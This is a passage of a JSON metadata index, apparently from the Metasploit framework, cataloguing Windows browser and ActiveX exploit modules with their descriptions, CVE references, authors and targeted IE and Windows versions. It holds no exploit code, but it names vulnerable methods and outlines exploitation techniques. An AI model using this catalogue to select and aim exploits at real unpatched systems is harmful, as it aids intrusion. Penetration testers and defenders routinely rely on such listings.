"CVE-2013-3897",
"OSVDB-98207",
"MSB-MS13-080",
"URL-http://blogs.technet.com/b/srd/archive/2013/10/08/ms13-080-addresses-two-vulnerabilities-under-limited-targeted-attacks.aspx",
"URL-http://jsunpack.jeek.org/?report=847afb154a4e876d61f93404842d9a1b93a774fb"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"IE 7 on Windows XP SP3",
"IE 8 on Windows XP SP3",
"IE 8 on Windows 7"
],
"mod_time": "2017-09-09 09:52:08 +0000",
"path": "/modules/exploits/windows/browser/ms13_080_cdisplaypointer.rb",
"is_install_path": true,
"ref_name": "windows/browser/ms13_080_cdisplaypointer",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ms13_090_cardspacesigninhelper": {
"name": "MS13-090 CardSpaceClaimCollection ActiveX Integer Underflow",
"full_name": "exploit/windows/browser/ms13_090_cardspacesigninhelper",
"rank": 300,
"disclosure_date": "2013-11-08",
"type": "exploit",
"author": [
"Unknown",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a vulnerability on the CardSpaceClaimCollection class from the\n icardie.dll ActiveX control. The vulnerability exists while the handling of the\n CardSpaceClaimCollection object. CardSpaceClaimCollections stores a collection of\n elements on a SafeArray and keeps a size field, counting the number of elements on the\n collection. By calling the remove() method on an empty CardSpaceClaimCollection it is\n possible to underflow the length field, storing a negative integer. Later, a call to\n the add() method will use the corrupted length field to compute the address where write\n into the SafeArray data, allowing to corrupt memory with a pointer to controlled contents.\n This module achieves code execution by using VBScript as discovered in the wild on\n November 2013 to (1) create an array of html OBJECT elements, (2) create holes, (3) create\n a CardSpaceClaimCollection whose SafeArray data will reuse one of the holes, (4) corrupt\n one of the legit OBJECT elements with the described integer overflow and (5) achieve code\n execution by forcing the use of the corrupted OBJECT.",
"references": [
"CVE-2013-3918",
"OSVDB-99555",
"BID-63631",
"MSB-MS13-090",
"URL-http://blogs.technet.com/b/msrc/archive/2013/11/11/activex-control-issue-being-addressed-in-update-tuesday.aspx"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP with IE 8"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/ms13_090_cardspacesigninhelper.rb",
"is_install_path": true,
"ref_name": "windows/browser/ms13_090_cardspacesigninhelper",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ms14_012_cmarkup_uaf": {
"name": "MS14-012 Microsoft Internet Explorer CMarkup Use-After-Free",
"full_name": "exploit/windows/browser/ms14_012_cmarkup_uaf",
"rank": 300,
"disclosure_date": "2014-02-13",
"type": "exploit",
"author": [
"Unknown",
"Jean-Jamil Khalife",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits an use after free condition on Internet Explorer as used in the wild\n as part of \"Operation SnowMan\" in February 2014. The module uses Flash Player 12 in order to\n bypass ASLR and DEP.",
"references": [
"CVE-2014-0322",
"MSB-MS14-012",
"BID-65551",
"URL-http://www.fireeye.com/blog/technical/cyber-exploits/2014/02/operation-snowman-deputydog-actor-compromises-us-veterans-of-foreign-wars-website.html",
"URL-http://hdwsec.fr/blog/CVE-2014-0322.html"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 7 SP1 / IE 10 / FP 12"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/ms14_012_cmarkup_uaf.rb",
"is_install_path": true,
"ref_name": "windows/browser/ms14_012_cmarkup_uaf",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ms14_012_textrange": {
"name": "MS14-012 Microsoft Internet Explorer TextRange Use-After-Free",
"full_name": "exploit/windows/browser/ms14_012_textrange",
"rank": 300,
"disclosure_date": "2014-03-11",
"type": "exploit",
"author": [
"Jason Kratzer",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a use-after-free vulnerability found in Internet Explorer. The flaw\n was most likely introduced in 2013, therefore only certain builds of MSHTML are\n affected. In our testing with IE9, these vulnerable builds appear to be between\n 9.0.8112.16496 and 9.0.8112.16533, which implies the vulnerability shipped between\n August 2013, when it was introduced, until the fix issued in early March 2014.",
"references": [
"CVE-2014-0307",
"MSB-MS14-012"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/ms14_012_textrange.rb",
"is_install_path": true,
"ref_name": "windows/browser/ms14_012_textrange",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ms14_064_ole_code_execution": {
"name": "MS14-064 Microsoft Internet Explorer Windows OLE Automation Array Remote Code Execution",
"full_name": "exploit/windows/browser/ms14_064_ole_code_execution",
"rank": 400,
"disclosure_date": "2014-11-13",
"type": "exploit",
"author": [
"Robert Freeman",
"yuange",
"Rik van Duijn",
"Wesley Neelen",
"GradiusX <francescomifsud@gmail.com>",
"b33f",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits the Windows OLE Automation array vulnerability, CVE-2014-6332.\n The vulnerability is known to affect Internet Explorer 3.0 until version 11 within\n Windows 95 up to Windows 10, and no patch for Windows XP. However, this exploit will\n only target Windows XP and Windows 7 box due to the Powershell limitation.\n\n Windows XP by defaults supports VBS, therefore it is used as the attack vector. On other\n newer Windows systems, the exploit will try using Powershell instead.",
"references": [
"CVE-2014-6332",
"MSB-MS14-064",
"OSVDB-114533",
"EDB-35229",
"EDB-35308",
"URL-http://securityintelligence.com/ibm-x-force-researcher-finds-significant-vulnerability-in-microsoft-windows",
"URL-https://forsec.nl/2014/11/cve-2014-6332-internet-explorer-msf-module"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP",
"Windows 7"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/ms14_064_ole_code_execution.rb",
"is_install_path": true,
"ref_name": "windows/browser/ms14_064_ole_code_execution",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ms16_051_vbscript": {
"name": "Internet Explorer 11 VBScript Engine Memory Corruption",
"full_name": "exploit/windows/browser/ms16_051_vbscript",
"rank": 300,
"disclosure_date": "2016-05-10",
"type": "exploit",
"author": [
"Theori",
"William Webb <william_webb@rapid7.com>"
],
"description": "This module exploits the memory corruption vulnerability (CVE-2016-0189)\n present in the VBScript engine of Internet Explorer 11.",
"references": [
"CVE-2016-0189",
"MSB-MS16-051"
],
"platform": "Windows",
"arch": "x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Windows 10 with IE 11"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/ms16_051_vbscript.rb",
"is_install_path": true,
"ref_name": "windows/browser/ms16_051_vbscript",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/msvidctl_mpeg2": {
"name": "Microsoft DirectShow (msvidctl.dll) MPEG-2 Memory Corruption",
"full_name": "exploit/windows/browser/msvidctl_mpeg2",
"rank": 300,
"disclosure_date": "2009-07-05",
"type": "exploit",
"author": [
"Trancer <mtrancer@gmail.com>"
],
"description": "This module exploits a memory corruption within the MSVidCtl component of Microsoft\n DirectShow (BDATuner.MPEG2TuneRequest).\n By loading a specially crafted GIF file, an attacker can overrun a buffer and\n execute arbitrary code.\n\n ClassID is now configurable via an advanced option (otherwise randomized) - I)ruid",
"references": [
"CVE-2008-0015",
"OSVDB-55651",
"BID-35558",
"MSB-MS09-032",
"MSB-MS09-037",
"URL-http://www.microsoft.com/technet/security/advisory/972890.mspx"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/msvidctl_mpeg2.rb",
"is_install_path": true,
"ref_name": "windows/browser/msvidctl_mpeg2",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/mswhale_checkforupdates": {
"name": "Microsoft Whale Intelligent Application Gateway ActiveX Control Buffer Overflow",
"full_name": "exploit/windows/browser/mswhale_checkforupdates",
"rank": 300,
"disclosure_date": "2009-04-15",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Microsoft Whale Intelligent Application\n Gateway Whale Client. When sending an overly long string to CheckForUpdates()\n method of WhlMgr.dll (3.1.502.64) an attacker may be able to execute\n arbitrary code.",
"references": [
"CVE-2007-2238",
"OSVDB-53933",
"URL-http://technet.microsoft.com/en-us/library/dd282918.aspx"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/mswhale_checkforupdates.rb",
"is_install_path": true,
"ref_name": "windows/browser/mswhale_checkforupdates",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/msxml_get_definition_code_exec": {
"name": "MS12-043 Microsoft XML Core Services MSXML Uninitialized Memory Corruption",
"full_name": "exploit/windows/browser/msxml_get_definition_code_exec",
"rank": 400,
"disclosure_date": "2012-06-12",
"type": "exploit",
"author": [
"inking26",
"binjo",
"sinn3r <sinn3r@metasploit.com>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a memory corruption flaw in Microsoft XML Core Services\n when trying to access an uninitialized Node with the getDefinition API, which\n may corrupt memory allowing remote code execution.",
"references": [
"CVE-2012-1889",
"BID-53934",
"OSVDB-82873",
"MSB-MS12-043",
"URL-http://technet.microsoft.com/en-us/security/advisory/2719615",
"URL-http://www.zdnet.com/blog/security/state-sponsored-attackers-using-ie-zero-day-to-hijack-gmail-accounts/12462",
"URL-https://community.rapid7.com/community/metasploit/blog/2012/06/18/metasploit-exploits-critical-microsoft-vulnerabilities"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"IE 6 on Windows XP SP3",
"IE 7 on Windows XP SP3 / Vista SP2",
"IE 8 on Windows XP SP3",
"IE 8 with Java 6 on Windows XP SP3",
"IE 8 with Java 6 on Windows 7 SP1/Vista SP2",
"IE 9 with Java 6 on Windows 7 SP1"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/msxml_get_definition_code_exec.rb",
"is_install_path": true,
"ref_name": "windows/browser/msxml_get_definition_code_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/nctaudiofile2_setformatlikesample": {
"name": "NCTAudioFile2 v2.x ActiveX Control SetFormatLikeSample() Buffer Overflow",
"full_name": "exploit/windows/browser/nctaudiofile2_setformatlikesample",
"rank": 300,
"disclosure_date": "2007-01-24",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>",
"dookie",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in the NCTAudioFile2.Audio ActiveX\n Control provided by various audio applications. By sending an overly long\n string to the \"SetFormatLikeSample()\" method, an attacker may be able to\n execute arbitrary code.",
"references": [
"CVE-2007-0018",
"OSVDB-32032",
"BID-22196",
"US-CERT-VU-292713"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP2/SP3 Pro English (IE6)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/nctaudiofile2_setformatlikesample.rb",
"is_install_path": true,
"ref_name": "windows/browser/nctaudiofile2_setformatlikesample",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/nis2004_antispam": {
"name": "Norton AntiSpam 2004 SymSpamHelper ActiveX Control Buffer Overflow",
"full_name": "exploit/windows/browser/nis2004_antispam",
"rank": 300,
"disclosure_date": "2004-03-19",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Norton AntiSpam 2004. When\n sending an overly long string to the LaunchCustomRuleWizard() method\n of symspam.dll (2004.1.0.147) an attacker may be able to execute\n arbitrary code.",
"references": [
"CVE-2004-0363",
"OSVDB-6249",
"BID-9916"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/nis2004_antispam.rb",
"is_install_path": true,
"ref_name": "windows/browser/nis2004_antispam",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/nis2004_get": {
"name": "Symantec Norton Internet Security 2004 ActiveX Control Buffer Overflow",
"full_name": "exploit/windows/browser/nis2004_get",
"rank": 300,
"disclosure_date": "2007-05-16",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in the ISAlertDataCOM ActiveX\n Control (ISLAert.dll) provided by Symantec Norton Internet Security 2004.\n By sending an overly long string to the \"Get()\" method, an attacker may be\n able to execute arbitrary code.",
"references": [
"CVE-2007-1689",
"OSVDB-36164",
"URL-http://securityresponse.symantec.com/avcenter/security/Content/2007.05.16.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP0/SP1 Pro English",
"Windows 2000 Pro English All"
],
"mod_time": "2017-09-09 09:52:08 +0000",
"path": "/modules/exploits/windows/browser/nis2004_get.rb",
"is_install_path": true,
"ref_name": "windows/browser/nis2004_get",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/notes_handler_cmdinject": {
"name": "IBM Lotus Notes Client URL Handler Command Injection",
"full_name": "exploit/windows/browser/notes_handler_cmdinject",
"rank": 600,
"disclosure_date": "2012-06-18",
"type": "exploit",
"author": [
"Moritz Jodeit",
"Sean de Regge",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a command injection vulnerability in the URL handler for\n for the IBM Lotus Notes Client <= 8.5.3. The registered handler can be abused with\n a specially crafted notes:// URL to execute arbitrary commands with also arbitrary\n arguments. This module has been tested successfully on Windows XP SP3 with IE8,\n Google Chrome 23.0.1271.97 m and IBM Lotus Notes Client 8.5.2.",
"references": [
"CVE-2012-2174",
"OSVDB-83063",
"BID-54070",
"ZDI-12-154",
"URL-http://pwnanisec.blogspot.com/2012/10/exploiting-command-injection.html",
"URL-http://www-304.ibm.com/support/docview.wss?uid=swg21598348"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/notes_handler_cmdinject.rb",
"is_install_path": true,
"ref_name": "windows/browser/notes_handler_cmdinject",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/novell_groupwise_gwcls1_actvx": {
"name": "Novell GroupWise Client gwcls1.dll ActiveX Remote Code Execution",
"full_name": "exploit/windows/browser/novell_groupwise_gwcls1_actvx",
"rank": 300,
"disclosure_date": "2013-01-30",
"type": "exploit",
"author": [
"rgod <rgod@autistici.org>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a vulnerability in the Novell GroupWise Client gwcls1.dll\n ActiveX. Several methods in the GWCalServer control use user provided data as\n a pointer, which allows to read arbitrary memory and execute arbitrary code. This\n module has been tested successfully with GroupWise Client 2012 on IE6 - IE9. The\n JRE6 needs to be installed to achieve ASLR bypass.",
"references": [
"CVE-2012-0439",
"OSVDB-89700",
"BID-57658",
"ZDI-13-008",
"URL-http://www.novell.com/support/kb/doc.php?id=7011688"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"IE 6 on Windows XP SP3",
"IE 7 on Windows XP SP3",
"IE 8 on Windows XP SP3",
"IE 7 on Windows Vista",
"IE 8 on Windows Vista",
"IE 8 on Windows 7",
"IE 9 on Windows 7"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/novell_groupwise_gwcls1_actvx.rb",
"is_install_path": true,
"ref_name": "windows/browser/novell_groupwise_gwcls1_actvx",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/novelliprint_callbackurl": {
"name": "Novell iPrint Client ActiveX Control call-back-url Buffer Overflow",
"full_name": "exploit/windows/browser/novelliprint_callbackurl",
"rank": 300,
"disclosure_date": "2010-08-20",
"type": "exploit",
"author": [
"Trancer <mtrancer@gmail.com>"
],
"description": "This module exploits a stack-based buffer overflow in Novell iPrint Client 5.42.\n When sending an overly long string to the 'call-back-url' parameter in an\n op-client-interface-version action of ienipp.ocx an attacker may be able to\n execute arbitrary code.",
"references": [
"CVE-2010-1527",
"OSVDB-67411",
"URL-http://secunia.com/secunia_research/2010-104/",
"EDB-15042"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP0-SP2 / Windows Vista / IE 6.0 SP0-SP2 / IE 7"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/novelliprint_callbackurl.rb",
"is_install_path": true,
"ref_name": "windows/browser/novelliprint_callbackurl",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/novelliprint_datetime": {
"name": "Novell iPrint Client ActiveX Control Date/Time Buffer Overflow",
"full_name": "exploit/windows/browser/novelliprint_datetime",
"rank": 500,
"disclosure_date": "2009-12-08",
"type": "exploit",
"author": [
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Novell iPrint Client 5.30. When\n passing a specially crafted date/time string via certain parameters to ienipp.ocx\n an attacker can execute arbitrary code.\n\n NOTE: The \"operation\" variable must be set to a valid command in order to reach this\n vulnerability.",
"references": [
"CVE-2009-1569",
"BID-37242",
"OSVDB-60804",
"URL-http://secunia.com/advisories/35004/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"iPrint 5.30 Windows Client"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/novelliprint_datetime.rb",
"is_install_path": true,
"ref_name": "windows/browser/novelliprint_datetime",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/novelliprint_executerequest": {
"name": "Novell iPrint Client ActiveX Control ExecuteRequest Buffer Overflow",
"full_name": "exploit/windows/browser/novelliprint_executerequest",
"rank": 300,
"disclosure_date": "2008-02-22",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Novell iPrint Client 4.26. When\n sending an overly long string to the ExecuteRequest() property of ienipp.ocx\n an attacker may be able to execute arbitrary code.",
"references": [
"CVE-2008-0935",
"OSVDB-42063",
"BID-27939"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP0-SP2 / Windows Vista / IE 6.0 SP0-SP2 / IE 7"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/novelliprint_executerequest.rb",
"is_install_path": true,
"ref_name": "windows/browser/novelliprint_executerequest",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/novelliprint_executerequest_dbg": {
"name": "Novell iPrint Client ActiveX Control ExecuteRequest debug Buffer Overflow",
"full_name": "exploit/windows/browser/novelliprint_executerequest_dbg",
"rank": 300,
"disclosure_date": "2010-08-04",
"type": "exploit",
"author": [
"Trancer <mtrancer@gmail.com>"
],
"description": "This module exploits a stack-based buffer overflow in Novell iPrint Client 5.40.\n When sending an overly long string to the 'debug' parameter in ExecuteRequest()\n property of ienipp.ocx an attacker may be able to execute arbitrary code.",
"references": [
"CVE-2010-3106",
"OSVDB-66960",
"URL-http://dvlabs.tippingpoint.com/advisory/TPTI-10-06",
"EDB-15001"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP0-SP2 / Windows Vista / IE 6.0 SP0-SP2 / IE 7"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/novelliprint_executerequest_dbg.rb",
"is_install_path": true,
"ref_name": "windows/browser/novelliprint_executerequest_dbg",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/novelliprint_getdriversettings": {
"name": "Novell iPrint Client ActiveX Control Buffer Overflow",
"full_name": "exploit/windows/browser/novelliprint_getdriversettings",
"rank": 300,
"disclosure_date": "2008-06-16",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Novell iPrint Client 4.34. When\n sending an overly long string to the GetDriverSettings() property of ienipp.ocx\n an attacker may be able to execute arbitrary code.",
"references": [
"CVE-2008-2908",
"OSVDB-46194",
"URL-http://secunia.com/advisories/30709/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/novelliprint_getdriversettings.rb",
"is_install_path": true,
"ref_name": "windows/browser/novelliprint_getdriversettings",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/novelliprint_getdriversettings_2": {
"name": "Novell iPrint Client ActiveX Control Buffer Overflow",
"full_name": "exploit/windows/browser/novelliprint_getdriversettings_2",
"rank": 300,
"disclosure_date": "2010-11-15",
"type": "exploit",
"author": [
"mr_me <steventhomasseeley@gmail.com>",
"Dr_IDE"
],
"description": "This module exploits a stack buffer overflow in Novell iPrint Client 5.52. When\n sending an overly long string to the GetDriverSettings() property of ienipp.ocx\n an attacker may be able to execute arbitrary code.",
"references": [
"CVE-2010-4321",
"BID-44966",
"OSVDB-69357",
"ZDI-10-256",
"EDB-16014",
"URL-http://www.novell.com/support/viewContent.do?externalId=7007234"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/novelliprint_getdriversettings_2.rb",
"is_install_path": true,
"ref_name": "windows/browser/novelliprint_getdriversettings_2",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/novelliprint_target_frame": {
"name": "Novell iPrint Client ActiveX Control target-frame Buffer Overflow",
"full_name": "exploit/windows/browser/novelliprint_target_frame",
"rank": 500,
"disclosure_date": "2009-12-08",
"type": "exploit",
"author": [
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Novell iPrint Client 5.30. When\n passing an overly long string via the \"target-frame\" parameter to ienipp.ocx\n an attacker can execute arbitrary code.\n\n NOTE: The \"operation\" variable must be set to a valid command in order to reach this\n vulnerability.",
"references": [
"CVE-2009-1568",
"BID-37242",
"OSVDB-60803",
"URL-http://secunia.com/advisories/37169/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"iPrint 5.30 Windows Client"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/novelliprint_target_frame.rb",
"is_install_path": true,
"ref_name": "windows/browser/novelliprint_target_frame",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ntr_activex_check_bof": {
"name": "NTR ActiveX Control Check() Method Buffer Overflow",
"full_name": "exploit/windows/browser/ntr_activex_check_bof",
"rank": 300,
"disclosure_date": "2012-01-11",
"type": "exploit",
"author": [
"Carsten Eiram",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a vulnerability found in NTR ActiveX 1.1.8. The\n vulnerability exists in the Check() method, due to the insecure usage of strcat to\n build a URL using the bstrParams parameter contents (note: this is also the reason\n why the module won't allow you to modify the URIPATH), which leads to code execution\n under the context of the user visiting a malicious web page. In order to bypass\n DEP and ASLR on Windows Vista and Windows 7 JRE 6 is needed.",
"references": [
"CVE-2012-0266",
"OSVDB-78252",
"BID-51374",
"URL-http://secunia.com/secunia_research/2012-1/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"IE 6 on Windows XP SP3",
"IE 7 on Windows XP SP3",
"IE 8 on Windows XP SP3",
"IE 7 on Windows Vista",
"IE 8 on Windows Vista",
"IE 8 on Windows 7",
"IE 9 on Windows 7"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/ntr_activex_check_bof.rb",
"is_install_path": true,
"ref_name": "windows/browser/ntr_activex_check_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ntr_activex_stopmodule": {
"name": "NTR ActiveX Control StopModule() Remote Code Execution",
"full_name": "exploit/windows/browser/ntr_activex_stopmodule",
"rank": 300,
"disclosure_date": "2012-01-11",
"type": "exploit",
"author": [
"Carsten Eiram",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a vulnerability found in the NTR ActiveX 1.1.8. The\n vulnerability exists in the StopModule() method, where the lModule parameter is\n used to dereference memory to get a function pointer, which leads to code execution\n under the context of the user visiting a malicious web page.",
"references": [
"CVE-2012-0267",
"OSVDB-78253",
"BID-51374",
"URL-http://secunia.com/secunia_research/2012-2/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"IE 6 on Windows XP SP3",
"IE 7 on Windows XP SP3",
"IE 7 on Windows Vista"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/ntr_activex_stopmodule.rb",
"is_install_path": true,
"ref_name": "windows/browser/ntr_activex_stopmodule",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/oracle_autovue_setmarkupmode": {
"name": "Oracle AutoVue ActiveX Control SetMarkupMode Buffer Overflow",
"full_name": "exploit/windows/browser/oracle_autovue_setmarkupmode",
"rank": 300,
"disclosure_date": "2012-04-18",
"type": "exploit",
"author": [
"Brian Gorenc",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a vulnerability found in the AutoVue.ocx ActiveX control.\n The vulnerability, due to the insecure usage of an strcpy like function in the\n SetMarkupMode method, when handling a specially crafted sMarkup argument, allows\n to trigger a stack based buffer overflow which leads to code execution under the\n context of the user visiting a malicious web page.\n\n The module has been successfully tested against Oracle AutoVue Desktop Version\n 20.0.0 (AutoVue.ocx 20.0.0.7330) on IE 6, 7, 8 and 9 (Java 6 needed to DEP and\n ASLR bypass).",
"references": [
"CVE-2012-0549",
"BID-53077",
"OSVDB-81439",
"URL-http://dvlabs.tippingpoint.com/advisory/TPTI-12-05",
"URL-http://www.oracle.com/technetwork/topics/security/cpuapr2012-366314.html",
"URL-https://community.rapid7.com/community/metasploit/blog/2012/08/15/the-stack-cookies-bypass-on-cve-2012-0549"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"IE 6 on Windows XP SP3",
"IE 7 on Windows XP SP3 / Windows Vista SP2",
"IE 8 with Java 6 on Windows XP SP3/7 SP1/Vista SP2",
"IE 9 with Java 6 on Windows 7 SP1"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/oracle_autovue_setmarkupmode.rb",
"is_install_path": true,
"ref_name": "windows/browser/oracle_autovue_setmarkupmode",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/oracle_dc_submittoexpress": {
"name": "Oracle Document Capture 10g ActiveX Control Buffer Overflow",
"full_name": "exploit/windows/browser/oracle_dc_submittoexpress",
"rank": 300,
"disclosure_date": "2009-08-28",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Oracle Document Capture 10g (10.1.3.5.0).\n Oracle Document Capture 10g comes bundled with a third party ActiveX control\n emsmtp.dll (6.0.1.0). When passing an overly long string to the method \"SubmitToExpress\"\n an attacker may be able to execute arbitrary code.",
"references": [
"CVE-2007-4607",
"OSVDB-38335",
"BID-25467",
"US-CERT-VU-281977"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7"
],
"mod_time": "2017-10-05 16:44:36 +0000",
